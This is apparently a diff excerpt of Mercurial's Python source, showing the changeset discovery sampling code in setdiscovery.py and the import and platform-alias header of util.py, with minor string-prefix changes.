40 classified with it (since all ancestors or descendants will be marked as well).
40 classified with it (since all ancestors or descendants will be marked as well).
41 """
41 """
42
42
43 from __future__ import absolute_import
43 from __future__ import absolute_import
44
44
45 import collections
45 import collections
46 import random
46 import random
47
47
48 from .i18n import _
48 from .i18n import _
49 from .node import (
49 from .node import (
50 nullid,
50 nullid,
51 nullrev,
51 nullrev,
52 )
52 )
53 from . import (
53 from . import (
54 error,
54 error,
55 policy,
55 policy,
56 util,
56 util,
57 )
57 )
58
58
59 def _updatesample(revs, heads, sample, parentfn, quicksamplesize=0):
59 def _updatesample(revs, heads, sample, parentfn, quicksamplesize=0):
60 """update an existing sample to match the expected size
60 """update an existing sample to match the expected size
61
61
62 The sample is updated with revs exponentially distant from each head of the
62 The sample is updated with revs exponentially distant from each head of the
63 <revs> set. (H~1, H~2, H~4, H~8, etc).
63 <revs> set. (H~1, H~2, H~4, H~8, etc).
64
64
65 If a target size is specified, the sampling will stop once this size is
65 If a target size is specified, the sampling will stop once this size is
66 reached. Otherwise sampling will happen until roots of the <revs> set are
66 reached. Otherwise sampling will happen until roots of the <revs> set are
67 reached.
67 reached.
68
68
69 :revs: set of revs we want to discover (if None, assume the whole dag)
69 :revs: set of revs we want to discover (if None, assume the whole dag)
70 :heads: set of DAG head revs
70 :heads: set of DAG head revs
71 :sample: a sample to update
71 :sample: a sample to update
72 :parentfn: a callable to resolve parents for a revision
72 :parentfn: a callable to resolve parents for a revision
73 :quicksamplesize: optional target size of the sample"""
73 :quicksamplesize: optional target size of the sample"""
74 dist = {}
74 dist = {}
75 visit = collections.deque(heads)
75 visit = collections.deque(heads)
76 seen = set()
76 seen = set()
77 factor = 1
77 factor = 1
78 while visit:
78 while visit:
79 curr = visit.popleft()
79 curr = visit.popleft()
80 if curr in seen:
80 if curr in seen:
81 continue
81 continue
82 d = dist.setdefault(curr, 1)
82 d = dist.setdefault(curr, 1)
83 if d > factor:
83 if d > factor:
84 factor *= 2
84 factor *= 2
85 if d == factor:
85 if d == factor:
86 sample.add(curr)
86 sample.add(curr)
87 if quicksamplesize and (len(sample) >= quicksamplesize):
87 if quicksamplesize and (len(sample) >= quicksamplesize):
88 return
88 return
89 seen.add(curr)
89 seen.add(curr)
90
90
91 for p in parentfn(curr):
91 for p in parentfn(curr):
92 if p != nullrev and (not revs or p in revs):
92 if p != nullrev and (not revs or p in revs):
93 dist.setdefault(p, d + 1)
93 dist.setdefault(p, d + 1)
94 visit.append(p)
94 visit.append(p)
95
95
96 def _limitsample(sample, desiredlen, randomize=True):
96 def _limitsample(sample, desiredlen, randomize=True):
97 """return a random subset of sample of at most desiredlen item.
97 """return a random subset of sample of at most desiredlen item.
98
98
99 If randomize is False, though, a deterministic subset is returned.
99 If randomize is False, though, a deterministic subset is returned.
100 This is meant for integration tests.
100 This is meant for integration tests.
101 """
101 """
102 if len(sample) <= desiredlen:
102 if len(sample) <= desiredlen:
103 return sample
103 return sample
104 if randomize:
104 if randomize:
105 return set(random.sample(sample, desiredlen))
105 return set(random.sample(sample, desiredlen))
106 sample = list(sample)
106 sample = list(sample)
107 sample.sort()
107 sample.sort()
108 return set(sample[:desiredlen])
108 return set(sample[:desiredlen])
109
109
110 class partialdiscovery(object):
110 class partialdiscovery(object):
111 """an object representing ongoing discovery
111 """an object representing ongoing discovery
112
112
113 Feed with data from the remote repository, this object keep track of the
113 Feed with data from the remote repository, this object keep track of the
114 current set of changeset in various states:
114 current set of changeset in various states:
115
115
116 - common: revs also known remotely
116 - common: revs also known remotely
117 - undecided: revs we don't have information on yet
117 - undecided: revs we don't have information on yet
118 - missing: revs missing remotely
118 - missing: revs missing remotely
119 (all tracked revisions are known locally)
119 (all tracked revisions are known locally)
120 """
120 """
121
121
122 def __init__(self, repo, targetheads, respectsize, randomize=True):
122 def __init__(self, repo, targetheads, respectsize, randomize=True):
123 self._repo = repo
123 self._repo = repo
124 self._targetheads = targetheads
124 self._targetheads = targetheads
125 self._common = repo.changelog.incrementalmissingrevs()
125 self._common = repo.changelog.incrementalmissingrevs()
126 self._undecided = None
126 self._undecided = None
127 self.missing = set()
127 self.missing = set()
128 self._childrenmap = None
128 self._childrenmap = None
129 self._respectsize = respectsize
129 self._respectsize = respectsize
130 self.randomize = randomize
130 self.randomize = randomize
131
131
132 def addcommons(self, commons):
132 def addcommons(self, commons):
133 """register nodes known as common"""
133 """register nodes known as common"""
134 self._common.addbases(commons)
134 self._common.addbases(commons)
135 if self._undecided is not None:
135 if self._undecided is not None:
136 self._common.removeancestorsfrom(self._undecided)
136 self._common.removeancestorsfrom(self._undecided)
137
137
138 def addmissings(self, missings):
138 def addmissings(self, missings):
139 """register some nodes as missing"""
139 """register some nodes as missing"""
140 newmissing = self._repo.revs('%ld::%ld', missings, self.undecided)
140 newmissing = self._repo.revs('%ld::%ld', missings, self.undecided)
141 if newmissing:
141 if newmissing:
142 self.missing.update(newmissing)
142 self.missing.update(newmissing)
143 self.undecided.difference_update(newmissing)
143 self.undecided.difference_update(newmissing)
144
144
145 def addinfo(self, sample):
145 def addinfo(self, sample):
146 """consume an iterable of (rev, known) tuples"""
146 """consume an iterable of (rev, known) tuples"""
147 common = set()
147 common = set()
148 missing = set()
148 missing = set()
149 for rev, known in sample:
149 for rev, known in sample:
150 if known:
150 if known:
151 common.add(rev)
151 common.add(rev)
152 else:
152 else:
153 missing.add(rev)
153 missing.add(rev)
154 if common:
154 if common:
155 self.addcommons(common)
155 self.addcommons(common)
156 if missing:
156 if missing:
157 self.addmissings(missing)
157 self.addmissings(missing)
158
158
159 def hasinfo(self):
159 def hasinfo(self):
160 """return True is we have any clue about the remote state"""
160 """return True is we have any clue about the remote state"""
161 return self._common.hasbases()
161 return self._common.hasbases()
162
162
163 def iscomplete(self):
163 def iscomplete(self):
164 """True if all the necessary data have been gathered"""
164 """True if all the necessary data have been gathered"""
165 return self._undecided is not None and not self._undecided
165 return self._undecided is not None and not self._undecided
166
166
167 @property
167 @property
168 def undecided(self):
168 def undecided(self):
169 if self._undecided is not None:
169 if self._undecided is not None:
170 return self._undecided
170 return self._undecided
171 self._undecided = set(self._common.missingancestors(self._targetheads))
171 self._undecided = set(self._common.missingancestors(self._targetheads))
172 return self._undecided
172 return self._undecided
173
173
174 def stats(self):
174 def stats(self):
175 return {
175 return {
176 'undecided': len(self.undecided),
176 'undecided': len(self.undecided),
177 }
177 }
178
178
179 def commonheads(self):
179 def commonheads(self):
180 """the heads of the known common set"""
180 """the heads of the known common set"""
181 # heads(common) == heads(common.bases) since common represents
181 # heads(common) == heads(common.bases) since common represents
182 # common.bases and all its ancestors
182 # common.bases and all its ancestors
183 return self._common.basesheads()
183 return self._common.basesheads()
184
184
185 def _parentsgetter(self):
185 def _parentsgetter(self):
186 getrev = self._repo.changelog.index.__getitem__
186 getrev = self._repo.changelog.index.__getitem__
187 def getparents(r):
187 def getparents(r):
188 return getrev(r)[5:7]
188 return getrev(r)[5:7]
189 return getparents
189 return getparents
190
190
191 def _childrengetter(self):
191 def _childrengetter(self):
192
192
193 if self._childrenmap is not None:
193 if self._childrenmap is not None:
194 # During discovery, the `undecided` set keep shrinking.
194 # During discovery, the `undecided` set keep shrinking.
195 # Therefore, the map computed for an iteration N will be
195 # Therefore, the map computed for an iteration N will be
196 # valid for iteration N+1. Instead of computing the same
196 # valid for iteration N+1. Instead of computing the same
197 # data over and over we cached it the first time.
197 # data over and over we cached it the first time.
198 return self._childrenmap.__getitem__
198 return self._childrenmap.__getitem__
199
199
200 # _updatesample() essentially does interaction over revisions to look
200 # _updatesample() essentially does interaction over revisions to look
201 # up their children. This lookup is expensive and doing it in a loop is
201 # up their children. This lookup is expensive and doing it in a loop is
202 # quadratic. We precompute the children for all relevant revisions and
202 # quadratic. We precompute the children for all relevant revisions and
203 # make the lookup in _updatesample() a simple dict lookup.
203 # make the lookup in _updatesample() a simple dict lookup.
204 self._childrenmap = children = {}
204 self._childrenmap = children = {}
205
205
206 parentrevs = self._parentsgetter()
206 parentrevs = self._parentsgetter()
207 revs = self.undecided
207 revs = self.undecided
208
208
209 for rev in sorted(revs):
209 for rev in sorted(revs):
210 # Always ensure revision has an entry so we don't need to worry
210 # Always ensure revision has an entry so we don't need to worry
211 # about missing keys.
211 # about missing keys.
212 children[rev] = []
212 children[rev] = []
213 for prev in parentrevs(rev):
213 for prev in parentrevs(rev):
214 if prev == nullrev:
214 if prev == nullrev:
215 continue
215 continue
216 c = children.get(prev)
216 c = children.get(prev)
217 if c is not None:
217 if c is not None:
218 c.append(rev)
218 c.append(rev)
219 return children.__getitem__
219 return children.__getitem__
220
220
221 def takequicksample(self, headrevs, size):
221 def takequicksample(self, headrevs, size):
222 """takes a quick sample of size <size>
222 """takes a quick sample of size <size>
223
223
224 It is meant for initial sampling and focuses on querying heads and close
224 It is meant for initial sampling and focuses on querying heads and close
225 ancestors of heads.
225 ancestors of heads.
226
226
227 :headrevs: set of head revisions in local DAG to consider
227 :headrevs: set of head revisions in local DAG to consider
228 :size: the maximum size of the sample"""
228 :size: the maximum size of the sample"""
229 revs = self.undecided
229 revs = self.undecided
230 if len(revs) <= size:
230 if len(revs) <= size:
231 return list(revs)
231 return list(revs)
232 sample = set(self._repo.revs('heads(%ld)', revs))
232 sample = set(self._repo.revs('heads(%ld)', revs))
233
233
234 if len(sample) >= size:
234 if len(sample) >= size:
235 return _limitsample(sample, size, randomize=self.randomize)
235 return _limitsample(sample, size, randomize=self.randomize)
236
236
237 _updatesample(None, headrevs, sample, self._parentsgetter(),
237 _updatesample(None, headrevs, sample, self._parentsgetter(),
238 quicksamplesize=size)
238 quicksamplesize=size)
239 return sample
239 return sample
240
240
241 def takefullsample(self, headrevs, size):
241 def takefullsample(self, headrevs, size):
242 revs = self.undecided
242 revs = self.undecided
243 if len(revs) <= size:
243 if len(revs) <= size:
244 return list(revs)
244 return list(revs)
245 repo = self._repo
245 repo = self._repo
246 sample = set(repo.revs('heads(%ld)', revs))
246 sample = set(repo.revs('heads(%ld)', revs))
247 parentrevs = self._parentsgetter()
247 parentrevs = self._parentsgetter()
248
248
249 # update from heads
249 # update from heads
250 revsheads = sample.copy()
250 revsheads = sample.copy()
251 _updatesample(revs, revsheads, sample, parentrevs)
251 _updatesample(revs, revsheads, sample, parentrevs)
252
252
253 # update from roots
253 # update from roots
254 revsroots = set(repo.revs('roots(%ld)', revs))
254 revsroots = set(repo.revs('roots(%ld)', revs))
255 childrenrevs = self._childrengetter()
255 childrenrevs = self._childrengetter()
256 _updatesample(revs, revsroots, sample, childrenrevs)
256 _updatesample(revs, revsroots, sample, childrenrevs)
257 assert sample
257 assert sample
258
258
259 if not self._respectsize:
259 if not self._respectsize:
260 size = max(size, min(len(revsroots), len(revsheads)))
260 size = max(size, min(len(revsroots), len(revsheads)))
261
261
262 sample = _limitsample(sample, size, randomize=self.randomize)
262 sample = _limitsample(sample, size, randomize=self.randomize)
263 if len(sample) < size:
263 if len(sample) < size:
264 more = size - len(sample)
264 more = size - len(sample)
265 takefrom = list(revs - sample)
265 takefrom = list(revs - sample)
266 if self.randomize:
266 if self.randomize:
267 sample.update(random.sample(takefrom, more))
267 sample.update(random.sample(takefrom, more))
268 else:
268 else:
269 takefrom.sort()
269 takefrom.sort()
270 sample.update(takefrom[:more])
270 sample.update(takefrom[:more])
271 return sample
271 return sample
272
272
273 partialdiscovery = policy.importrust('discovery',
273 partialdiscovery = policy.importrust(r'discovery',
274 member='PartialDiscovery',
274 member=r'PartialDiscovery',
275 default=partialdiscovery)
275 default=partialdiscovery)
276
276
277 def findcommonheads(ui, local, remote,
277 def findcommonheads(ui, local, remote,
278 initialsamplesize=100,
278 initialsamplesize=100,
279 fullsamplesize=200,
279 fullsamplesize=200,
280 abortwhenunrelated=True,
280 abortwhenunrelated=True,
281 ancestorsof=None,
281 ancestorsof=None,
282 samplegrowth=1.05):
282 samplegrowth=1.05):
283 '''Return a tuple (common, anyincoming, remoteheads) used to identify
283 '''Return a tuple (common, anyincoming, remoteheads) used to identify
284 missing nodes from or in remote.
284 missing nodes from or in remote.
285 '''
285 '''
286 start = util.timer()
286 start = util.timer()
287
287
288 roundtrips = 0
288 roundtrips = 0
289 cl = local.changelog
289 cl = local.changelog
290 clnode = cl.node
290 clnode = cl.node
291 clrev = cl.rev
291 clrev = cl.rev
292
292
293 if ancestorsof is not None:
293 if ancestorsof is not None:
294 ownheads = [clrev(n) for n in ancestorsof]
294 ownheads = [clrev(n) for n in ancestorsof]
295 else:
295 else:
296 ownheads = [rev for rev in cl.headrevs() if rev != nullrev]
296 ownheads = [rev for rev in cl.headrevs() if rev != nullrev]
297
297
298 # early exit if we know all the specified remote heads already
298 # early exit if we know all the specified remote heads already
299 ui.debug("query 1; heads\n")
299 ui.debug("query 1; heads\n")
300 roundtrips += 1
300 roundtrips += 1
301 # We also ask remote about all the local heads. That set can be arbitrarily
301 # We also ask remote about all the local heads. That set can be arbitrarily
302 # large, so we used to limit it size to `initialsamplesize`. We no longer
302 # large, so we used to limit it size to `initialsamplesize`. We no longer
303 # do as it proved counter productive. The skipped heads could lead to a
303 # do as it proved counter productive. The skipped heads could lead to a
304 # large "undecided" set, slower to be clarified than if we asked the
304 # large "undecided" set, slower to be clarified than if we asked the
305 # question for all heads right away.
305 # question for all heads right away.
306 #
306 #
307 # We are already fetching all server heads using the `heads` commands,
307 # We are already fetching all server heads using the `heads` commands,
308 # sending a equivalent number of heads the other way should not have a
308 # sending a equivalent number of heads the other way should not have a
309 # significant impact. In addition, it is very likely that we are going to
309 # significant impact. In addition, it is very likely that we are going to
310 # have to issue "known" request for an equivalent amount of revisions in
310 # have to issue "known" request for an equivalent amount of revisions in
311 # order to decide if theses heads are common or missing.
311 # order to decide if theses heads are common or missing.
312 #
312 #
313 # find a detailled analysis below.
313 # find a detailled analysis below.
314 #
314 #
315 # Case A: local and server both has few heads
315 # Case A: local and server both has few heads
316 #
316 #
317 # Ownheads is below initialsamplesize, limit would not have any effect.
317 # Ownheads is below initialsamplesize, limit would not have any effect.
318 #
318 #
319 # Case B: local has few heads and server has many
319 # Case B: local has few heads and server has many
320 #
320 #
321 # Ownheads is below initialsamplesize, limit would not have any effect.
321 # Ownheads is below initialsamplesize, limit would not have any effect.
322 #
322 #
323 # Case C: local and server both has many heads
323 # Case C: local and server both has many heads
324 #
324 #
325 # We now transfert some more data, but not significantly more than is
325 # We now transfert some more data, but not significantly more than is
326 # already transfered to carry the server heads.
326 # already transfered to carry the server heads.
327 #
327 #
328 # Case D: local has many heads, server has few
328 # Case D: local has many heads, server has few
329 #
329 #
330 # D.1 local heads are mostly known remotely
330 # D.1 local heads are mostly known remotely
331 #
331 #
332 # All the known head will have be part of a `known` request at some
332 # All the known head will have be part of a `known` request at some
333 # point for the discovery to finish. Sending them all earlier is
333 # point for the discovery to finish. Sending them all earlier is
334 # actually helping.
334 # actually helping.
335 #
335 #
336 # (This case is fairly unlikely, it requires the numerous heads to all
336 # (This case is fairly unlikely, it requires the numerous heads to all
337 # be merged server side in only a few heads)
337 # be merged server side in only a few heads)
338 #
338 #
339 # D.2 local heads are mostly missing remotely
339 # D.2 local heads are mostly missing remotely
340 #
340 #
341 # To determine that the heads are missing, we'll have to issue `known`
341 # To determine that the heads are missing, we'll have to issue `known`
342 # request for them or one of their ancestors. This amount of `known`
342 # request for them or one of their ancestors. This amount of `known`
343 # request will likely be in the same order of magnitude than the amount
343 # request will likely be in the same order of magnitude than the amount
344 # of local heads.
344 # of local heads.
345 #
345 #
346 # The only case where we can be more efficient using `known` request on
346 # The only case where we can be more efficient using `known` request on
347 # ancestors are case were all the "missing" local heads are based on a
347 # ancestors are case were all the "missing" local heads are based on a
348 # few changeset, also "missing". This means we would have a "complex"
348 # few changeset, also "missing". This means we would have a "complex"
349 # graph (with many heads) attached to, but very independant to a the
349 # graph (with many heads) attached to, but very independant to a the
350 # "simple" graph on the server. This is a fairly usual case and have
350 # "simple" graph on the server. This is a fairly usual case and have
351 # not been met in the wild so far.
351 # not been met in the wild so far.
352 if remote.limitedarguments:
352 if remote.limitedarguments:
353 sample = _limitsample(ownheads, initialsamplesize)
353 sample = _limitsample(ownheads, initialsamplesize)
354 # indices between sample and externalized version must match
354 # indices between sample and externalized version must match
355 sample = list(sample)
355 sample = list(sample)
356 else:
356 else:
357 sample = ownheads
357 sample = ownheads
358
358
359 with remote.commandexecutor() as e:
359 with remote.commandexecutor() as e:
360 fheads = e.callcommand('heads', {})
360 fheads = e.callcommand('heads', {})
361 fknown = e.callcommand('known', {
361 fknown = e.callcommand('known', {
362 'nodes': [clnode(r) for r in sample],
362 'nodes': [clnode(r) for r in sample],
363 })
363 })
364
364
365 srvheadhashes, yesno = fheads.result(), fknown.result()
365 srvheadhashes, yesno = fheads.result(), fknown.result()
366
366
367 if cl.tip() == nullid:
367 if cl.tip() == nullid:
368 if srvheadhashes != [nullid]:
368 if srvheadhashes != [nullid]:
369 return [nullid], True, srvheadhashes
369 return [nullid], True, srvheadhashes
370 return [nullid], False, []
370 return [nullid], False, []
371
371
372 # start actual discovery (we note this before the next "if" for
372 # start actual discovery (we note this before the next "if" for
373 # compatibility reasons)
373 # compatibility reasons)
374 ui.status(_("searching for changes\n"))
374 ui.status(_("searching for changes\n"))
375
375
376 knownsrvheads = [] # revnos of remote heads that are known locally
376 knownsrvheads = [] # revnos of remote heads that are known locally
377 for node in srvheadhashes:
377 for node in srvheadhashes:
378 if node == nullid:
378 if node == nullid:
379 continue
379 continue
380
380
381 try:
381 try:
382 knownsrvheads.append(clrev(node))
382 knownsrvheads.append(clrev(node))
383 # Catches unknown and filtered nodes.
383 # Catches unknown and filtered nodes.
384 except error.LookupError:
384 except error.LookupError:
385 continue
385 continue
386
386
387 if len(knownsrvheads) == len(srvheadhashes):
387 if len(knownsrvheads) == len(srvheadhashes):
388 ui.debug("all remote heads known locally\n")
388 ui.debug("all remote heads known locally\n")
389 return srvheadhashes, False, srvheadhashes
389 return srvheadhashes, False, srvheadhashes
390
390
391 if len(sample) == len(ownheads) and all(yesno):
391 if len(sample) == len(ownheads) and all(yesno):
392 ui.note(_("all local heads known remotely\n"))
392 ui.note(_("all local heads known remotely\n"))
393 ownheadhashes = [clnode(r) for r in ownheads]
393 ownheadhashes = [clnode(r) for r in ownheads]
394 return ownheadhashes, True, srvheadhashes
394 return ownheadhashes, True, srvheadhashes
395
395
396 # full blown discovery
396 # full blown discovery
397
397
398 randomize = ui.configbool('devel', 'discovery.randomize')
398 randomize = ui.configbool('devel', 'discovery.randomize')
399 disco = partialdiscovery(local, ownheads, remote.limitedarguments,
399 disco = partialdiscovery(local, ownheads, remote.limitedarguments,
400 randomize=randomize)
400 randomize=randomize)
401 # treat remote heads (and maybe own heads) as a first implicit sample
401 # treat remote heads (and maybe own heads) as a first implicit sample
402 # response
402 # response
403 disco.addcommons(knownsrvheads)
403 disco.addcommons(knownsrvheads)
404 disco.addinfo(zip(sample, yesno))
404 disco.addinfo(zip(sample, yesno))
405
405
406 full = False
406 full = False
407 progress = ui.makeprogress(_('searching'), unit=_('queries'))
407 progress = ui.makeprogress(_('searching'), unit=_('queries'))
408 while not disco.iscomplete():
408 while not disco.iscomplete():
409
409
410 if full or disco.hasinfo():
410 if full or disco.hasinfo():
411 if full:
411 if full:
412 ui.note(_("sampling from both directions\n"))
412 ui.note(_("sampling from both directions\n"))
413 else:
413 else:
414 ui.debug("taking initial sample\n")
414 ui.debug("taking initial sample\n")
415 samplefunc = disco.takefullsample
415 samplefunc = disco.takefullsample
416 targetsize = fullsamplesize
416 targetsize = fullsamplesize
417 if not remote.limitedarguments:
417 if not remote.limitedarguments:
418 fullsamplesize = int(fullsamplesize * samplegrowth)
418 fullsamplesize = int(fullsamplesize * samplegrowth)
419 else:
419 else:
420 # use even cheaper initial sample
420 # use even cheaper initial sample
421 ui.debug("taking quick initial sample\n")
421 ui.debug("taking quick initial sample\n")
422 samplefunc = disco.takequicksample
422 samplefunc = disco.takequicksample
423 targetsize = initialsamplesize
423 targetsize = initialsamplesize
424 sample = samplefunc(ownheads, targetsize)
424 sample = samplefunc(ownheads, targetsize)
425
425
426 roundtrips += 1
426 roundtrips += 1
427 progress.update(roundtrips)
427 progress.update(roundtrips)
428 stats = disco.stats()
428 stats = disco.stats()
429 ui.debug("query %i; still undecided: %i, sample size is: %i\n"
429 ui.debug("query %i; still undecided: %i, sample size is: %i\n"
430 % (roundtrips, stats['undecided'], len(sample)))
430 % (roundtrips, stats['undecided'], len(sample)))
431
431
432 # indices between sample and externalized version must match
432 # indices between sample and externalized version must match
433 sample = list(sample)
433 sample = list(sample)
434
434
435 with remote.commandexecutor() as e:
435 with remote.commandexecutor() as e:
436 yesno = e.callcommand('known', {
436 yesno = e.callcommand('known', {
437 'nodes': [clnode(r) for r in sample],
437 'nodes': [clnode(r) for r in sample],
438 }).result()
438 }).result()
439
439
440 full = True
440 full = True
441
441
442 disco.addinfo(zip(sample, yesno))
442 disco.addinfo(zip(sample, yesno))
443
443
444 result = disco.commonheads()
444 result = disco.commonheads()
445 elapsed = util.timer() - start
445 elapsed = util.timer() - start
446 progress.complete()
446 progress.complete()
447 ui.debug("%d total queries in %.4fs\n" % (roundtrips, elapsed))
447 ui.debug("%d total queries in %.4fs\n" % (roundtrips, elapsed))
448 msg = ('found %d common and %d unknown server heads,'
448 msg = ('found %d common and %d unknown server heads,'
449 ' %d roundtrips in %.4fs\n')
449 ' %d roundtrips in %.4fs\n')
450 missing = set(result) - set(knownsrvheads)
450 missing = set(result) - set(knownsrvheads)
451 ui.log('discovery', msg, len(result), len(missing), roundtrips,
451 ui.log('discovery', msg, len(result), len(missing), roundtrips,
452 elapsed)
452 elapsed)
453
453
454 if not result and srvheadhashes != [nullid]:
454 if not result and srvheadhashes != [nullid]:
455 if abortwhenunrelated:
455 if abortwhenunrelated:
456 raise error.Abort(_("repository is unrelated"))
456 raise error.Abort(_("repository is unrelated"))
457 else:
457 else:
458 ui.warn(_("warning: repository is unrelated\n"))
458 ui.warn(_("warning: repository is unrelated\n"))
459 return ({nullid}, True, srvheadhashes,)
459 return ({nullid}, True, srvheadhashes,)
460
460
461 anyincoming = (srvheadhashes != [nullid])
461 anyincoming = (srvheadhashes != [nullid])
462 result = {clnode(r) for r in result}
462 result = {clnode(r) for r in result}
463 return result, anyincoming, srvheadhashes
463 return result, anyincoming, srvheadhashes
@@ -1,3326 +1,3326 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import mmap
25 import mmap
26 import os
26 import os
27 import platform as pyplatform
27 import platform as pyplatform
28 import re as remod
28 import re as remod
29 import shutil
29 import shutil
30 import socket
30 import socket
31 import stat
31 import stat
32 import sys
32 import sys
33 import time
33 import time
34 import traceback
34 import traceback
35 import warnings
35 import warnings
36
36
37 from .thirdparty import (
37 from .thirdparty import (
38 attr,
38 attr,
39 )
39 )
40 from hgdemandimport import tracing
40 from hgdemandimport import tracing
41 from . import (
41 from . import (
42 encoding,
42 encoding,
43 error,
43 error,
44 i18n,
44 i18n,
45 node as nodemod,
45 node as nodemod,
46 policy,
46 policy,
47 pycompat,
47 pycompat,
48 urllibcompat,
48 urllibcompat,
49 )
49 )
50 from .utils import (
50 from .utils import (
51 compression,
51 compression,
52 procutil,
52 procutil,
53 stringutil,
53 stringutil,
54 )
54 )
55
55
56 rustdirs = policy.importrust('dirstate', 'Dirs')
56 rustdirs = policy.importrust(r'dirstate', r'Dirs')
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 httplib = pycompat.httplib
66 httplib = pycompat.httplib
67 pickle = pycompat.pickle
67 pickle = pycompat.pickle
68 safehasattr = pycompat.safehasattr
68 safehasattr = pycompat.safehasattr
69 socketserver = pycompat.socketserver
69 socketserver = pycompat.socketserver
70 bytesio = pycompat.bytesio
70 bytesio = pycompat.bytesio
71 # TODO deprecate stringio name, as it is a lie on Python 3.
71 # TODO deprecate stringio name, as it is a lie on Python 3.
72 stringio = bytesio
72 stringio = bytesio
73 xmlrpclib = pycompat.xmlrpclib
73 xmlrpclib = pycompat.xmlrpclib
74
74
75 httpserver = urllibcompat.httpserver
75 httpserver = urllibcompat.httpserver
76 urlerr = urllibcompat.urlerr
76 urlerr = urllibcompat.urlerr
77 urlreq = urllibcompat.urlreq
77 urlreq = urllibcompat.urlreq
78
78
79 # workaround for win32mbcs
79 # workaround for win32mbcs
80 _filenamebytestr = pycompat.bytestr
80 _filenamebytestr = pycompat.bytestr
81
81
82 if pycompat.iswindows:
82 if pycompat.iswindows:
83 from . import windows as platform
83 from . import windows as platform
84 else:
84 else:
85 from . import posix as platform
85 from . import posix as platform
86
86
87 _ = i18n._
87 _ = i18n._
88
88
89 bindunixsocket = platform.bindunixsocket
89 bindunixsocket = platform.bindunixsocket
90 cachestat = platform.cachestat
90 cachestat = platform.cachestat
91 checkexec = platform.checkexec
91 checkexec = platform.checkexec
92 checklink = platform.checklink
92 checklink = platform.checklink
93 copymode = platform.copymode
93 copymode = platform.copymode
94 expandglobs = platform.expandglobs
94 expandglobs = platform.expandglobs
95 getfsmountpoint = platform.getfsmountpoint
95 getfsmountpoint = platform.getfsmountpoint
96 getfstype = platform.getfstype
96 getfstype = platform.getfstype
97 groupmembers = platform.groupmembers
97 groupmembers = platform.groupmembers
98 groupname = platform.groupname
98 groupname = platform.groupname
99 isexec = platform.isexec
99 isexec = platform.isexec
100 isowner = platform.isowner
100 isowner = platform.isowner
101 listdir = osutil.listdir
101 listdir = osutil.listdir
102 localpath = platform.localpath
102 localpath = platform.localpath
103 lookupreg = platform.lookupreg
103 lookupreg = platform.lookupreg
104 makedir = platform.makedir
104 makedir = platform.makedir
105 nlinks = platform.nlinks
105 nlinks = platform.nlinks
106 normpath = platform.normpath
106 normpath = platform.normpath
107 normcase = platform.normcase
107 normcase = platform.normcase
108 normcasespec = platform.normcasespec
108 normcasespec = platform.normcasespec
109 normcasefallback = platform.normcasefallback
109 normcasefallback = platform.normcasefallback
110 openhardlinks = platform.openhardlinks
110 openhardlinks = platform.openhardlinks
111 oslink = platform.oslink
111 oslink = platform.oslink
112 parsepatchoutput = platform.parsepatchoutput
112 parsepatchoutput = platform.parsepatchoutput
113 pconvert = platform.pconvert
113 pconvert = platform.pconvert
114 poll = platform.poll
114 poll = platform.poll
115 posixfile = platform.posixfile
115 posixfile = platform.posixfile
116 readlink = platform.readlink
116 readlink = platform.readlink
117 rename = platform.rename
117 rename = platform.rename
118 removedirs = platform.removedirs
118 removedirs = platform.removedirs
119 samedevice = platform.samedevice
119 samedevice = platform.samedevice
120 samefile = platform.samefile
120 samefile = platform.samefile
121 samestat = platform.samestat
121 samestat = platform.samestat
122 setflags = platform.setflags
122 setflags = platform.setflags
123 split = platform.split
123 split = platform.split
124 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
125 statisexec = platform.statisexec
125 statisexec = platform.statisexec
126 statislink = platform.statislink
126 statislink = platform.statislink
127 umask = platform.umask
127 umask = platform.umask
128 unlink = platform.unlink
128 unlink = platform.unlink
129 username = platform.username
129 username = platform.username
130
130
131 # small compat layer
131 # small compat layer
132 compengines = compression.compengines
132 compengines = compression.compengines
133 SERVERROLE = compression.SERVERROLE
133 SERVERROLE = compression.SERVERROLE
134 CLIENTROLE = compression.CLIENTROLE
134 CLIENTROLE = compression.CLIENTROLE
135
135
136 try:
136 try:
137 recvfds = osutil.recvfds
137 recvfds = osutil.recvfds
138 except AttributeError:
138 except AttributeError:
139 pass
139 pass
140
140
141 # Python compatibility
141 # Python compatibility
142
142
143 _notset = object()
143 _notset = object()
144
144
145 def bitsfrom(container):
145 def bitsfrom(container):
146 bits = 0
146 bits = 0
147 for bit in container:
147 for bit in container:
148 bits |= bit
148 bits |= bit
149 return bits
149 return bits
150
150
151 # python 2.6 still have deprecation warning enabled by default. We do not want
151 # python 2.6 still have deprecation warning enabled by default. We do not want
152 # to display anything to standard user so detect if we are running test and
152 # to display anything to standard user so detect if we are running test and
153 # only use python deprecation warning in this case.
153 # only use python deprecation warning in this case.
154 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
